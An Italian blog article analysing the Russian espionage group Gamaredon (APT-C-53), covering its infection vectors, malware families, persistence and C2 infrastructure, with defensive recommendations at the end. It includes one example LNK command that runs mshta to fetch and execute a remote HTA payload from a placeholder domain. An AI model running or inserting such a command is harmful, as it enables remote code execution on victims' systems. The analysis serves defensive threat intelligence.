Red Hot Cyber, il blog italiano sulla sicurezza informatica
Red Hot Cyber
La cybersecurity è condivisione. Riconosci il rischio, combattilo, condividi le tue esperienze ed incentiva gli altri a fare meglio di te.
Select language
English Spanish
Cerca
Red Hot Cyber Academy

APT-C-53 (Gamaredon): Analisi delle Attività di Cyber Spionaggio

Sandro Sana : 11 Dicembre 2024 07:10

Il gruppo di Advanced Persistent Threat (APT) APT-C-53, noto anche come Gamaredon, Primitive Bear, Winterflounder e BlueAlpha, è un’entità di cyber spionaggio sponsorizzata dallo stato russo. Attivo dal 2013, è focalizzato su operazioni di intelligence contro organizzazioni governative, enti della difesa, istituzioni diplomatiche e media, con particolare attenzione all’Ucraina. Questo articolo fornisce un’analisi tecnica dettagliata delle metodologie e degli strumenti utilizzati da APT-C-53 nelle operazioni più recenti, facendo riferimento ai dati forniti da diverse fonti di Threat Intelligence, inclusa un’analisi pubblicata su WeChat.

Indice dei contenuti nascondi
1. Tecniche di Attacco e Vettori di Infezione
1.1. 1. File LNK Maligni
1.2. 2. File XHTML Malevoli
1.3. 3. Campagne di Spear-Phishing
2. Strumenti e Malware Impiegati
2.1. 1. Pteranodon
2.2. 2. LitterDrifter
2.3. 3. GammaLoad e GammaSteel
3. Tecniche di Persistenza e Obfuscation
4. Infrastruttura di Comando e Controllo (C2)
5. Settori Colpiti

Tecniche di Attacco e Vettori di Infezione

La mappa delle connessioni riportata nell’immagine evidenzia chiaramente la complessità dell’infrastruttura e delle tattiche impiegate dal gruppo APT-C-53 (Gamaredon). Come mostrato, l’attacco è caratterizzato da una rete intricata di indirizzi IP, domini malevoli e diverse tipologie di file utilizzati per distribuire i payload. Ogni nodo rappresenta un elemento cruciale della catena di infezione, mentre le frecce illustrano le relazioni tra i vari componenti del processo di attacco, dai server di comando e controllo (C2) fino ai file malevoli utilizzati per compromettere i sistemi delle vittime.

L’analisi visiva consente di comprendere come APT-C-53 sfrutti più vettori contemporaneamente per garantire il successo delle sue campagne di cyber spionaggio. Nei paragrafi seguenti, analizzeremo in dettaglio le tecniche di attacco più rilevanti e i vettori di infezione identificati, facendo riferimento ai collegamenti mostrati nell’immagine.

1. File LNK Maligni


Vuoi diventare un esperto del Dark Web e della Cyber Threat Intelligence (CTI)?
Stiamo per avviare il corso intermedio in modalità "Live Class" del corso "Dark Web & Cyber Threat Intelligence".
A differenza dei corsi in e-learning, disponibili online sulla nostra piattaforma con lezioni pre-registrate, i corsi in Live Class offrono un’esperienza formativa interattiva e coinvolgente.
Condotti dal professor Pietro Melillo, le lezioni si svolgono online in tempo reale, permettendo ai partecipanti di interagire direttamente con il docente e approfondire i contenuti in modo personalizzato. Questi corsi, ideali per aziende, consentono di sviluppare competenze mirate, affrontare casi pratici e personalizzare il percorso formativo in base alle esigenze specifiche del team, garantendo un apprendimento efficace e immediatamente applicabile.

Contattaci tramite WhatsApp al 375 593 1011 per richiedere ulteriori informazioni oppure scriviti alla casella di posta [email protected]



Supporta RHC attraverso:
L'acquisto del fumetto sul Cybersecurity Awareness
Ascoltando i nostri Podcast
Seguendo RHC su WhatsApp
Seguendo RHC su Telegram
Scarica gratuitamente "Dark Mirror", il report sul ransomware di Dark Lab


Se ti piacciono le novità e gli articoli riportati su di Red Hot Cyber, iscriviti immediatamente alla newsletter settimanale per non perdere nessun articolo. La newsletter generalmente viene inviata ai nostri lettori ad inizio settimana, indicativamente di lunedì.

APT-C-53 utilizza file di collegamento Windows (LNK) come vettore iniziale di infezione. Questi file contengono comandi che vengono eseguiti tramite processi legittimi come mshta.exe. L’obiettivo è eseguire script remoti dannosi senza destare sospetti. I file LNK sono spesso inseriti in archivi compressi distribuiti tramite email di phishing.

Esempio di Comando LNK:

mshta http://malicious-domain/payload.hta

2. File XHTML Malevoli

Un altro vettore di attacco comune è l’uso di file XHTML che scaricano e eseguono payload dannosi. Questi file vengono mascherati da documenti legittimi e, una volta aperti, eseguono script che stabiliscono una connessione con un server di comando e controllo (C2) per il download del malware principale.

Tecnica di Download Dinamico:

3. Campagne di Spear-Phishing

APT-C-53 eccelle nelle campagne di spear-phishing mirate. Le email sono personalizzate per ingannare specifici destinatari, spesso utilizzando temi rilevanti per il contesto geopolitico e istituzionale della vittima. Gli allegati includono documenti Office compromessi o archivi compressi contenenti file LNK o script dannosi.

Strumenti e Malware Impiegati

1. Pteranodon

Un trojan modulare utilizzato per ottenere accesso remoto ai sistemi infetti. Consente di eseguire comandi, esfiltrare dati e scaricare ulteriori moduli malevoli.

Funzionalità principali:

  • Esecuzione di comandi remoti
  • Esfiltrazione di file sensibili
  • Persistenza tramite chiavi di registro

2. LitterDrifter

Un worm scritto in VBScript (VBS) progettato per diffondersi tramite unità USB rimovibili. Questo malware sfrutta il trasferimento fisico di dispositivi per penetrare reti isolate.

Meccanismo di Diffusione:

  • Copia del file VBS nelle unità rimovibili
  • Creazione di file LNK dannosi nella root dell’unità USB
  • Esecuzione automatica tramite modifiche al file autorun.inf

3. GammaLoad e GammaSteel

Varianti di malware utilizzate per eseguire il download di ulteriori payload e mantenere il controllo persistente del sistema compromesso. Entrambi i malware sfruttano script PowerShell per comunicare con i server C2 e ricevere comandi dinamici.

Tecniche di Persistenza e Obfuscation

APT-C-53 implementa diverse tecniche di persistenza per mantenere l’accesso ai sistemi compromessi:

  1. Modifiche al Registro di Sistema:
    • Esecuzione automatica dei payload malevoli tramite chiavi di registro:
    • HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
  2. Obfuscation degli Script:
    • Uso di stringhe codificate in Base64, compressione e tecniche di offuscamento del codice per eludere i sistemi di rilevamento.
  3. Infettare Dispositivi Rimovibili:
    • Propagazione del malware tramite unità USB, facilitando la diffusione in ambienti chiusi o con limitata connettività esterna.

Infrastruttura di Comando e Controllo (C2)

L’infrastruttura C2 di APT-C-53 è composta da server che forniscono payload malevoli e ricevono dati esfiltrati. Il gruppo utilizza:

  • Indirizzi IP Dinamici e domini temporanei per evitare il blocco delle comunicazioni.
  • Tecniche di Fast Flux per cambiare frequentemente gli indirizzi IP associati ai domini C2.

Esempio di IP associato: 5.181.189.32

Settori Colpiti

I settori principali presi di mira da APT-C-53 includono:

  • Governo
  • Difesa
  • Diplomazia
  • Media
  • Attivisti e ONG

APT-C-53 (Gamaredon) rappresenta una delle minacce più persistenti e sofisticate nell’ambito del cyber spionaggio. L’utilizzo di tecniche avanzate di infezione, obfuscation e persistenza sottolinea l’importanza di implementare misure di sicurezza robuste come:

  • Filtri avanzati per email e allegati
  • Monitoraggio delle modifiche al registro di sistema
  • Segmentazione della rete e restrizioni sui dispositivi USB
  • Aggiornamenti costanti dei sistemi di rilevamento delle minacce

Rimanere aggiornati sulle TTP (Tactics, Techniques, and Procedures) di Gamaredon è essenziale per proteggere le infrastrutture critiche e prevenire potenziali compromissioni.

Sandro Sana
Membro del gruppo di Red Hot Cyber Dark Lab e direttore del Red Hot Cyber PodCast. Si occupa d'Information Technology dal 1990 e di Cybersecurity dal 2014 (CEH - CIH - CISSP - CSIRT Manager - CTI Expert), relatore a SMAU 2017 e SMAU 2018, docente SMAU Academy & ITS, membro ISACA. Fa parte del Comitato Scientifico del Competence Center nazionale Cyber 4.0, dove contribuisce all’indirizzo strategico delle attività di ricerca, formazione e innovazione nella cybersecurity.

Lista degli articoli
Visita il sito web dell'autore

Articoli in evidenza

Gli hacker criminali di The Gentlemen pubblicano la prima vittima italiana
Di Redazione RHC - 10/09/2025

Nella giornata di oggi, la nuova cyber-gang “The Gentlemen” rivendica all’interno del proprio Data Leak Site (DLS) il primo attacco ad una azienda italiana. Disclaimer: Questo rapporto include s...

10 su 10! SAP rilascia patch di sicurezza per vulnerabilità critiche in Netweaver
Di Redazione RHC - 10/09/2025

SAP ha reso disponibili degli aggiornamenti per la sicurezza Martedì, con l’obiettivo di risolvere varie vulnerabilità. Tra queste vulnerabilità, ve ne sono tre particolarmente critiche che si ve...

Verso L’Uroboro! Il CEO di OpenAI avverte: i social sono pieni di contenuti dei bot AI
Di Redazione RHC - 10/09/2025

Ci stiamo avviando a passi da gigante vero l’uroboro, ovvero il serpente che mangia la sua stessa coda. Ne avevamo parlato qualche settimana fa che il traffico umano su internet è in calo vertigino...

Preludio alla compromissione: è boom sulle scansioni mirate contro Cisco ASA
Di Redazione RHC - 10/09/2025

A fine agosto, GreyNoise ha registrato un forte aumento dell’attività di scansione mirata ai dispositivi Cisco ASA. Gli esperti avvertono che tali ondate spesso precedono la scoperta di nuove vulne...

In Nepal si muore per i Social Network! In 19 hanno perso la vita per riavere Facebook
Di Redazione RHC - 09/09/2025

Con una drammatica inversione di tendenza, il Nepal ha revocato il blackout nazionale sui social media imposto la scorsa settimana dopo che aveva scatenato massicce proteste giovanili e causato almeno...